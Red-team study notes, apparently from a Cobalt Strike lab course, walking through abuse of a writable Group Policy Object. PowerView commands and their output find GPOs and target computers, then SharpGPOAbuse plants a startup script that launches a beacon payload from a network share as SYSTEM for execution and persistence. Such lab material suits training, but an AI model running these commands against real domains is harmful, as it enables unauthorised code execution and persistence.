What is this changing
Notes
NotesSome other stuff
test
Notes
NotesSome other stuff
  • Mixing...
  • General
    • Transferring Files
      • Serving Your Files
      • Transferring Files To Linux
      • Transferring Files To Windows
    • File Types
      • .vhd
    • Password Cracking
      • Hashcat
        • Wordlists
        • Wordlist + Rules
        • Masks
        • Mask Files
        • Combinator
        • Hybrid
        • Keyboard Walks
    • Trash to sift through
      • Cookie 3.1.24.ctd
  • OSINT
  • Enumeration
  • Web Applications
    • Web Vulnerabilities
      • Web App Red Team Checklist
      • SSRF (Server Side Request Forgery)
      • Blind Data Exfiltration via DNS
      • XSS
      • XXE
      • XPath Injection
    • APIs
      • Web API Indicators
      • Passive Reconnaissance
      • Active API Reconnaissance
  • Active Directory
    • Reconnaissance
      • PowerView
      • SharpView
      • ADSearch
    • User Impersonation
      • Pass the Hash
      • Pass the Ticket
      • Overpass the Hash
      • Token Impersonation
      • Token Store
      • Make Token
      • Process Injection
    • Lateral Movement
      • Windows Remote Management
      • PsExec
      • Windows Management Instrumentation (WMI)
      • CoInitializeSecurity
      • DCOM
    • Kerberos
      • Kerberoasting
      • ASREP Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • S4U2Self Abuse
      • Resource-Based Constrained Delegation
      • Shadow Credentials
      • Kerberos Relay Attacks
    • Pivoting
      • SOCKS Proxies
      • Linux Tools For Proxies
      • Windows Tools For Proxies
      • Pivoting with Kerberos
      • Pivoting A Browser
      • Reverse Port Forwards
      • NTLM Relaying
      • Relaying WebDAV
    • AD Certificate Services
      • Find Certificate Authorities
      • Misconfigured Certificate Templates
      • NTLM Relaying to ADCS HTTP Endpoints
      • User & Computer Persistence
    • Group Policy
      • Modify Existing GPO
      • Create & Link a GPO
    • MS SQL Servers
      • MS SQL Impersonation
      • MS SQL Command Execution
      • MS SQL Lateral Movement
      • MS SQL Privilege Escalation
    • Configuration Manager
      • Enumeration
      • Network Access Account Credentials
      • Lateral Movement
    • Domain Dominance
      • Silver Tickets
      • Golden Ticket
      • Diamond Tickets
      • Forged Certificates
    • Forest & Domain Trusts
      • Parent/Child
      • One-Way Inbound
      • One-Way Outbound
    • LAPS (Local Administrator Password Solution)
      • Reading ms-Mcs-AdmPwd
      • Password Expiration Protection
      • LAPS Backdoors
  • Report Writing
    • Wireless Pentesting
  • Cobalt Strike
    • Starting
      • Start CS as a Service
      • Listener Management
      • Generating Payloads
      • Pivot Listeners
    • Take Screenshot
    • Mimikatz
      • NTLM Hashes
      • Kerberos Encryption Keys
      • Security Account Manager
      • Domain Cached Credentials
    • Extracting Kerberos Tickets
    • DCSync
    • Session Passing
      • Beacon Passing
      • Foreign Listener
      • Spawn & Inject
    • Credentials
      • Credential Manager
      • Scheduled Task Credentials
    • Evading Windows Defender
      • Artifact Kit
      • Malleable C2
      • Resource Kit
      • AMSI vs Post-Exploitation
      • Manual AMSI Bypasses
      • Behavioural Detections
      • Parent/Child Relationships
      • Command Line Detections
    • Application Whitelisting
      • Policy Enumeration
      • Writeable Paths
      • Binaries, Scripts, and Libraries
      • PowerShell CLM
      • Beacon DLL
Powered by GitBook
On this page
Edit on GitHub

Last updated 6 days ago

Modifying an existing GPO that is already applied to one or more OUs is the most straightforward scenario. To search for these, we need to enumerate all GPOs in the domain with Get-DomainGPO and check the ACL of each one with Get-DomainObjectAcl. We want to filter any for which a principal has modify privileges such as CreateChild, WriteProperty or GenericWrite, and also want to filter out the legitimate principals including SYSTEM, Domain Admins and Enterprise Admins.

One result has been returned. Let's resolve the GPO name and the SID of the principal.

This shows us that members of the "Developers" group can modify "Vulnerable GPO".

We also want to know which OU(s) this GPO applies to, and by extension which computers are in those OUs. GPOs are linked to an OU by modifying the gPLink property of the OU itself. The Get-DomainOU cmdlet has a handy -GPLink parameter which takes a GPO GUID.

Finally, to get the computers in an OU, we can use Get-DomainComputer and use the OU's distinguished name as a search base.

To modify a GPO without the use of GPMC (Group Policy Management Console), we can modify the associated files directly in SYSVOL (the gpcFileSysPath).

Here's an example using a Computer Startup Script. It will put a startup script in SYSVOL that will be executed each time an effected computer starts (which incidentally also acts as a good persistence mechanism).

Note that you can find this software share using PowerView:

It can go in any remote location as long as it's accessible by the target computer(s)

Log into the console of Workstation 1 and run gpupdate /force from a Command Prompt. Then reboot the machine. After it starts up, the DNS Beacon will execute as SYSTEM.

SharpGPOAbuse has other functions such as adding an immediate scheduled task that you may experiment with.

We can do that manually or use an automated tool such as , which has several abuses built into it.

beacon> powershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

AceType               : AccessAllowed
ObjectDN              : CN={5059FAC1-5E94-4361-95D3-3BB235A23928},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io
ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, GenericExecute
OpaqueLength          : 0
ObjectSID             : 
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-569305411-121244042-2357301523-1107
AccessMask            : 131127
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed
beacon> powershell Get-DomainGPO -Identity "CN={5059FAC1-5E94-4361-95D3-3BB235A23928},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" | select displayName, gpcFileSysPath

displayname    gpcfilesyspath                                                                              
-----------    --------------                                                                              
Vulnerable GPO \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{5059FAC1-5E94-4361-95D3-3BB235A23928}

beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
DEV\Developers
beacon> powershell Get-DomainOU -GPLink "{5059FAC1-5E94-4361-95D3-3BB235A23928}" | select distinguishedName

distinguishedname                         
-----------------                         
OU=Workstations,DC=dev,DC=cyberbotic,DC=io
beacon> powershell Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName

dnshostname              
-----------              
wkstn-1.dev.cyberbotic.io
wkstn-2.dev.cyberbotic.io
beacon> ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{5059FAC1-5E94-4361-95D3-3BB235A23928}

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     09/07/2022 12:40:22   Machine
          dir     09/07/2022 12:40:22   User
 59b      fil     09/07/2022 12:40:22   GPT.INI
SharpGPOAbuse
beacon> execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\dc-2\software\dns_x64.exe" --GPOName "Vulnerable GPO"

[+] Domain = dev.cyberbotic.io
[+] Domain Controller = dc-2.dev.cyberbotic.io
[+] Distinguished Name = CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io
[+] GUID of "Vulnerable GPO" is: {5059FAC1-5E94-4361-95D3-3BB235A23928}
[+] Creating new startup script...
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new startup script. Wait for the GPO refresh cycle.
[+] Done!
 
beacon> powershell Find-DomainShare -CheckShareAccess

Name           Type Remark              ComputerName
----           ---- ------              ------------
software          0                     dc-2.dev.cyberbotic.io
PreviousGroup PolicyNextCreate & Link a GPO
  1. Active Directory
  2. Group Policy

Modify Existing GPO